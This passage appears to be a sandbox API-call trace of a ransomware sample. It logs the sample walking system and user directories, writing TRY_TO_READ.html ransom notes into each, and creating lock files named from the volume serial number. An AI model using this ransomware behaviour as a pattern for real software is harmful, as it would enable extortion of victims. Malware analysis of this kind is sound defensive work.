0x470a68 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.319] GetLastError () returned 0x0 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0065.319] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.319] GetLastError () returned 0x0 [0065.319] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b2c8 [0065.320] CreateFileW (lpFileName="C:\\\\PerfLogs\\Admin\\TRY_TO_READ.html" (normalized: "c:\\perflogs\\admin\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3e8 [0065.328] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.328] WriteFile (in: hFile=0x3e8, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.329] WriteFile (in: hFile=0x3e8, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.329] WriteFile (in: hFile=0x3e8, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.329] CloseHandle (hObject=0x3e8) returned 1 [0065.329] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0065.329] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.329] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.329] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.329] FindNextFileW (in: hFindFile=0x447c68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.329] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.329] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.329] GetLastError () returned 0x0 [0065.329] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.330] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b80 [0065.330] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.330] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.330] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b80 | out: hHeap=0x410000) returned 1 [0065.330] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.330] FindNextFileW (in: hFindFile=0x447c68, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3069af50, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.330] CloseHandle (hObject=0x3cc) returned 1 [0065.330] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.330] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x3cb)) [0065.330] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.330] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.330] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.331] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Recovery9c354ca09c354b444c.lock") returned 35 [0065.331] CreateFileW (lpFileName="C:\\\\Recovery9c354ca09c354b444c.lock" (normalized: "c:\\recovery9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.331] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.331] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.331] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47cae0 [0065.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4720a0 | out: hHeap=0x410000) returned 1 [0065.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca18 | out: hHeap=0x410000) returned 1 [0065.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca40 | out: hHeap=0x410000) returned 1 [0065.331] FindFirstFileW (in: lpFileName="C:\\\\Recovery\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447ca8 [0065.331] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.331] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.331] GetLastError () returned 0x0 [0065.331] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.331] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca18 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ce8 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ce8 | out: hHeap=0x410000) returned 1 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca18 | out: hHeap=0x410000) returned 1 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.332] FindNextFileW (in: hFindFile=0x447ca8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.332] GetLastError () returned 0x0 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b2c8 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca18 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447ce8 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447ce8 | out: hHeap=0x410000) returned 1 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca18 | out: hHeap=0x410000) returned 1 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.332] FindNextFileW (in: hFindFile=0x447ca8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.332] GetLastError () returned 0x0 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x457db8 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.332] GetLastError () returned 0x0 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b2c8 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b320 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b2c8 | out: hHeap=0x410000) returned 1 [0065.332] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x449be8 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca18 [0065.332] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x70) returned 0x466ea8 [0065.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665b8 [0065.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4665c8 [0065.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458280 [0065.333] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.333] GetLastError () returned 0x0 [0065.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0065.333] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458280 | out: hHeap=0x410000) returned 1 [0065.333] GetLastError () returned 0x0 [0065.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x461440 [0065.333] CreateFileW (lpFileName="C:\\\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\TRY_TO_READ.html" (normalized: "c:\\recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3ec [0065.333] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461440 | out: hHeap=0x410000) returned 1 [0065.333] WriteFile (in: hFile=0x3ec, lpBuffer=0x479438*, nNumberOfBytesToWrite=0x549, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x479438*, lpNumberOfBytesWritten=0x367f454*=0x549, lpOverlapped=0x0) returned 1 [0065.334] WriteFile (in: hFile=0x3ec, lpBuffer=0x1263190*, nNumberOfBytesToWrite=0xf30, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1263190*, lpNumberOfBytesWritten=0x367f454*=0xf30, lpOverlapped=0x0) returned 1 [0065.334] WriteFile (in: hFile=0x3ec, lpBuffer=0x1257fe8*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x367f454, lpOverlapped=0x0 | out: lpBuffer=0x1257fe8*, lpNumberOfBytesWritten=0x367f454*=0x4b, lpOverlapped=0x0) returned 1 [0065.334] CloseHandle (hObject=0x3ec) returned 1 [0065.334] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0065.334] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665c8 | out: hHeap=0x410000) returned 1 [0065.334] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4665b8 | out: hHeap=0x410000) returned 1 [0065.335] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x466ea8 | out: hHeap=0x410000) returned 1 [0065.335] FindNextFileW (in: hFindFile=0x447ca8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x306c10b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0065.335] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457db8 | out: hHeap=0x410000) returned 1 [0065.335] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.335] GetLastError () returned 0x0 [0065.335] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.335] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b80 [0065.335] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.335] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.335] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b80 | out: hHeap=0x410000) returned 1 [0065.335] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.335] FindNextFileW (in: hFindFile=0x447ca8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x306c10b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0065.335] CloseHandle (hObject=0x3cc) returned 1 [0065.335] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.335] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x3cb)) [0065.335] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.335] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.335] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.336] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\System Volume Information9c354ca09c354b444c.lock") returned 52 [0065.336] CreateFileW (lpFileName="C:\\\\System Volume Information9c354ca09c354b444c.lock" (normalized: "c:\\system volume information9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.336] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.336] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.336] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x454160 [0065.336] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cae0 | out: hHeap=0x410000) returned 1 [0065.336] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4541a8 | out: hHeap=0x410000) returned 1 [0065.336] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca68 | out: hHeap=0x410000) returned 1 [0065.336] FindFirstFileW (in: lpFileName="C:\\\\System Volume Information\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x306c10b0, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x306c10b0, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x306c10b0, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0065.336] CloseHandle (hObject=0x3cc) returned 1 [0065.337] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0065.337] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x4, wMilliseconds=0x3db)) [0065.337] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0065.337] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0065.337] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0065.337] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users9c354ca09c354b444c.lock") returned 32 [0065.337] CreateFileW (lpFileName="C:\\\\Users9c354ca09c354b444c.lock" (normalized: "c:\\users9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0065.337] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.338] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca68 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454160 | out: hHeap=0x410000) returned 1 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca90 | out: hHeap=0x410000) returned 1 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47cab8 | out: hHeap=0x410000) returned 1 [0065.338] FindFirstFileW (in: lpFileName="C:\\\\Users\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x447ce8 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.338] GetLastError () returned 0x0 [0065.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca90 [0065.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447d28 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447d28 | out: hHeap=0x410000) returned 1 [0065.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca90 | out: hHeap=0x410000) returned 1 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.338] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3069af50, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x3069af50, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.338] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.338] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.338] GetLastError () returned 0x0 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4c) returned 0x45b320 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45b320 | out: hHeap=0x410000) returned 1 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47ca90 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x34) returned 0x447d28 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x447d28 | out: hHeap=0x410000) returned 1 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x46a8b8 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a8b8 | out: hHeap=0x410000) returned 1 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ca90 | out: hHeap=0x410000) returned 1 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.339] FindNextFileW (in: hFindFile=0x447ce8, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4540d0 | out: hHeap=0x410000) returned 1 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x4540d0 [0065.339] GetLastError () returned 0x0 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0065.339] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470b80 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0065.339] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470b80 | out: hHeap=0x410000) returned 1 [0065.339] RtlAllocateHeap 